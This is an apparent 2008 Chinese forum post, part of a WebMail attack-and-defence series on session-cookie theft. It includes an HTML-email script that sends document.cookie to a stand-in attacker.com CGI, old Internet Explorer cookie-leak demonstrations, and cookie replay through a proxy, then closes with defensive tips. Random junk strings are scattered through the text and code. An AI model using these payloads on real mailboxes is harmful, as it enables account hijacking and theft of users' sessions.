Webmail攻防實戰(6)(頁 1) - Mail伺服器 - EXWOLF討論區 |bbs.exwolf.com

wolf 發表於 2008-1-6 17:27

Webmail攻防實戰(6)

如果攻擊者能夠獲取用戶WebMail的cookie信息，那么就能很容易地侵入用戶的WebMail。攻擊者如何獲取用戶WebMail的 cookie信息呢？如果攻擊者在用戶的電腦上安裝了木馬，或者能夠從網絡線路上對用戶進行嗅探偵聽，那么獲取cookie信息自然不成問題，不過這並不是我們討論問題的意義所在，因為都能夠這樣了，又何必大費周折去獲取cookie信息，直接獲取郵箱密碼就是了。
FrhP*^ohB3?k
如果WebMail係統存在跨站腳本執行漏洞，那么攻擊者就能欺騙用戶從而輕易地獲取cookie信息，雖然眾多網站存在此漏洞，但存在此漏洞的WebMail係統還很少見。  )S;vTLs{S
含有惡性腳本程序的html郵件能使攻擊者獲取WebMail的cookie信息。Html郵件中的腳本程序先提取當前WebMail的cookie信息，然後把它賦值給某個表單元素，再將表單自動提交給攻擊者，攻擊者從而獲得cookie會話信息。下面是一段演示程序：
　　_S*\7Oh$?DM^0q~

[table=95%][tr][td][color=#ff0000]以下為引用的內容：[/color]7fB1I N%?9U
　　＜body＞
　　＜formmethod="post"action="http://attacker.com/getcookie.cgi"name="myform"＞(vW!x8HP+PmUz
　　＜inputname="session"type="hidden"＞
　　＜/form＞1};x6}}-v8HO8Wbl
　　c+j T+oal/]+P&I
　　＜scriptlanguage="JavaScript"＞
　　varcookie=(document.cookie)；xq(Xk9ZF @
　　alert(cookie)；//這一句用於顯示當前cookie信息，當然，攻擊者不會這樣做。0[o3D2s2o5ze"yO
　　document.myform.session.value=cookie； [color=#f5fafe][/color]
　　document.myform.submit()；
　　＜/script＞[/td][/tr][/table]~t&o%w7[c(B
　　
getcookie.cgi是放在攻擊者web服務器上的一個cgi程序，用於獲取表單提交過來的cookie信息，並且做記錄或者通知攻擊者。當然，攻擊者會把html郵件、getcookie.cgi程序設計得更隱蔽，更具欺騙性，讓用戶難以察覺。
通常，瀏覽器根據web服務器的域名來分別保存cookie信息，並且只會把cookie信息發送給同一域名的web服務器。不過，瀏覽器的漏洞給攻擊者獲取不同域名的cookie信息創造了機會，InternetExplorer、Netscape和Mozilla等被廣泛使用的瀏覽器都存在過此類漏洞。下面是幾個InternetExplorer瀏覽器（針對IE5.0、IE5.5或IE6.0）泄漏cookie信息的例子：  k\{n,F0ac
(1)Html語言中的object元素用於在當前頁面內嵌入外部對象，但InternetExplorer瀏覽器對object元素屬性的處理不當會導致任意域的cookie信息被泄漏，演示代碼如下：'t| r[/FP/u3?,mx
　　
rV7S sv#~&YC\z
[table=95%][tr][td][color=#ff0000]以下為引用的內容：[/color]k/R3U3zk
　　＜objectid="data"data="empty.html"type="text/html"＞＜/object＞
　　＜script＞QhytiOIH/Vr
　　varref=document.getElementById("data").object；
　　ref.location.href="http://www.anydomain.com"；[2U4Jn%w+@
　　setTimeout("alert(ref.cookie)",5000)；8v9}s-k#B{m/A
　　＜/script＞[/td][/tr][/table]
　　!yD H$F.|Xx%`
(2)InternetExplorer瀏覽器錯誤處理“about”協議使得一個精心構造的URL請求可能會顯示或修改任意域的cookie信息，例如（以下代碼在同一行）： Sp3z!qD
about://www.anydomain.com/＜scriptlanguage=JavaScript＞alert(document.cookie)；＜/script＞ [color=#f5fafe][/color] (D#T$qz R$d5Ae
(3)InternetExplorer瀏覽器會誤把URL中“%20”（空格符的URL編碼）字符串之前的主機名當做cookie信息所在的域，並且發送出去。假設攻擊者有一個域名“attacker.com”，攻擊者把它做成泛域名解析，即把“*.attacker.com”指向攻擊者web服務器所在的IP地址，“attacker.com”下的任何子域名或主機名都會被解析成這個IP地址，當用戶提交了類似下面這樣的URL後，瀏覽器就會把 “anydomain.com”域名的cookie信息發送給攻擊者： Www.
http://anydomain.com%20.attacker.com/getcookie.cgi

如果攻擊者要獲取WebMail的臨時型cookie信息，就會在html郵件中寫入相應的代碼，在用戶瀏覽郵件時，該代碼自動執行，使得攻擊者能夠獲取當前瀏覽器裏的臨時cookie信息，也可以把用於獲取cookie信息的URL發送給用戶，誘騙用戶打開該URL，這樣攻擊者也能獲取臨時 cookie信息。 z{`H.AX7Cu

在攻擊者獲取cookie信息後，如果cookie信息裏含有密碼等敏感信息，那么攻擊者就能很輕易地侵入用戶的郵箱，雖然hotmail等WebMail係統曾經發生過此類的情況，但cookie信息泄漏敏感信息的WebMail係統還很少見。
A3UG'Np{
攻擊者在獲取cookie信息之後，還要讓此cookie信息由瀏覽器來存取從而與WebMail係統建立會話，這樣才能侵入用戶的 WebMail。如果是持久型cookie信息，攻擊者所要做的是把這個信息復制到自己的cookie文件中去，由瀏覽器存取該cookie信息從而與 WebMail係統建立會話，不過臨時cookie信息存儲在內存中，並不容易讓瀏覽器存取。 Zs){s["u j,K1I;[jW6p

為了讓瀏覽器存取臨時cookie信息，攻擊者可以編輯內存中的cookie信息，或者修改公開源代碼的瀏覽器，讓瀏覽器能夠編輯cookie信息，不過這樣都不是很簡便的方法，簡便的方法是使用Achilles程序（packetstormsecurity.org網站有下載）。 Achilles是一個http代理服務器，能夠載取瀏覽器和web服務器間的http會話信息，並且在代理轉發數據之前可以編輯http會話以及臨時 cookie信息。
WebMail係統應該避免使用持久型cookie會話跟蹤，使攻擊者在cookie會話攻擊上不能輕易得逞。為了防止cookie會話攻擊，用戶可以採取如下措施以加強安全：  v)IL C0l
(1)設置瀏覽器的cookie安全級別，阻止所有cookie或者只接受某幾個域的cookie。 d+jVP']/|
C w2@E*p `
(2)使用cookie管理工具，增強係統cookie安全，如CookiePal、BurntCookies等。 U(ET [(n
B"z+|I Yg
(3)及時給瀏覽器打補丁，防止cookie信息泄漏。

頁: [1]

EXWOLF討論區's Archiver

Webmail攻防實戰(6)